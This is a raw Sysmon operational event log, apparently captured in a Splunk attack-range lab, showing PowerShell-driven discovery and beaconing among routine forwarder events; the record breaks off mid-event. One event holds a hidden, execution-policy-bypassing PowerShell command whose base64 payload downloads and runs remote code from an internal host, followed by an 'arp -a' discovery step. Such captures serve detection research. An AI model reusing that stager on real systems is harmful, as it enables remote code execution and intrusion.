15:09:18.145{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344276Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:18.145{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-751E-613B-7EB4-03000000C801}5436C:\Windows\system32\ARP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344275Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:18.145{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-751E-613B-7EB4-03000000C801}5436C:\Windows\system32\ARP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035344274Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:18.151{B81B27B7-751E-613B-7EB4-03000000C801}5436C:\Windows\System32\ARP.EXE10.0.14393.0 (rs1_release.160715-1616)TCP/IP Arp CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationarp.exe"C:\Windows\system32\ARP.EXE" -aC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=1E065F9F13F4A59292BE9B2EC513D7A6,SHA256=CCA1F962F9435330C556F07A1745D743AD7ACAD7561C4C79420B0BF16C8E1D0A,IMPHASH=B3077D4D25C0193C09E23EF3AC7B070E{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 354300x800000000000000035344288Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:45.465{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52661-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035344287Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:45.138{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52660-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344286Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:19.505{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47E3C33A7D502C6231C697AC6D48263D,SHA256=221C26F8DEF55E4EC8749BD164DA78A825150D31585055B6A9D0CCC9B2350DF5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344285Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:19.152{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=02A9247E61E57936D7703EDBF3D695D8,SHA256=FBA1C1F985E3C58618473BF2ABA327FA41049BC7EDCEE7BFC81BD680CD938051,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344289Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:20.550{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AFAF9683F44E10BFB734CC359B990F1,SHA256=A9AB6276028B45FA5BEA8662DCC37A6AA5569E3D3A6B158F387EC295D0F6A8E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344290Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:21.568{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BB8CE0E00F5BC5A5EE12E0CDC98726E,SHA256=A9C2DFD725B55DA8B13A563BE017D83642C3DE8E02E7EEA4B30B7A4E1F25B74F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344291Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:22.587{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F786D56CCDFF19FCFBE3828E162933C2,SHA256=45EE7EFF8B42764B5394714357407E3EACE7BC71F0089719048BDDA45C6A6633,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344295Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.112{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52662-false10.0.1.12-8000- 23542300x800000000000000035344294Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:23.602{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=09A2C60A50CDF25D37E1ECAFADB4FBC8,SHA256=F0A4FA300C334043E7399558DF3ABC09DC569CB7A64CDC89614633893E1BEFB5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344293Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:23.602{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66C1653838755EA09A2E4148AF7C0C06,SHA256=F2121A5B4A12A61EFBB106649F42734762579DF8950FF932C798A34C147894FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344292Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:23.286{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344297Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:49.496{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52663-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344296Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:24.616{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7361F3C4E2529FC5AFB860952182CE5,SHA256=BF50A688A8FCA1D1D13EB33E10E9CBDEFA32E343A9D438AEB42E39F79FE15612,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:50.273{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52664-false10.0.1.12-8089- 23542300x800000000000000035344298Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:25.631{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65E167F72C895F747447BB3EE2F3BFDE,SHA256=83B1704976219CDCCCA2539409D2643A96F27711CD95E49E911ED0A1E2F89AE8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:26.633{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A007419032FE36DF7A082DD54C6E3AB0,SHA256=A237BE2A64FEC7E4325F55291E02EC3D72B10E22939146E72E1A9BF21AE2DC49,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:27.649{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A20AA3CA7C803B803310781723BDC996,SHA256=F02F5FA4FE457D2663109182563B18F92D7EA38EF913A1CA555B084622647C3D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:27.533{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=85351F2D971745F619192B02A85551E0,SHA256=1DF689EF8AF82CF2965D66A5EFBBF756AA81C7BF8FF66AF78C72E447F6EDDDC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:28.732{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F00040D06EB91C1ED771B69F2EFF9F23,SHA256=C60375EA4594E37530A2BEF7EF1819B813E8C6AA27B44033E408FA91C00736DD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:53.520{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52665-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:29.765{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8CD36B1DC572E731FE3D3F6089DB57B,SHA256=BB3D83232FE97570442EE291E0D695DFF1352775FEDE673712C16D07B4B96593,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:30.784{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7434A930E6B4DCECEBDD2A105DB0BE59,SHA256=51F96E95B252FDFD0CD4268BD3F70A6A99710EB45A5B65D482A4BC24A2DC9CED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:54.057{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52666-false10.0.1.12-8000- 23542300x800000000000000035344326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.864{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EA4492F0DF5A4FBB937F96D9AD4678C,SHA256=8ABED219A7BF49DC7989F20BE7EDF67261A3D70537C7AF53CF9884B3E3A72B62,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.830{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-752B-613B-80B4-03000000C801}1772C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.830{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.830{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.830{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.830{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.830{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-752B-613B-80B4-03000000C801}1772C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.830{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-752B-613B-80B4-03000000C801}1772C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035344318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.815{B81B27B7-752B-613B-80B4-03000000C801}1772C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035344317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:31.546{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 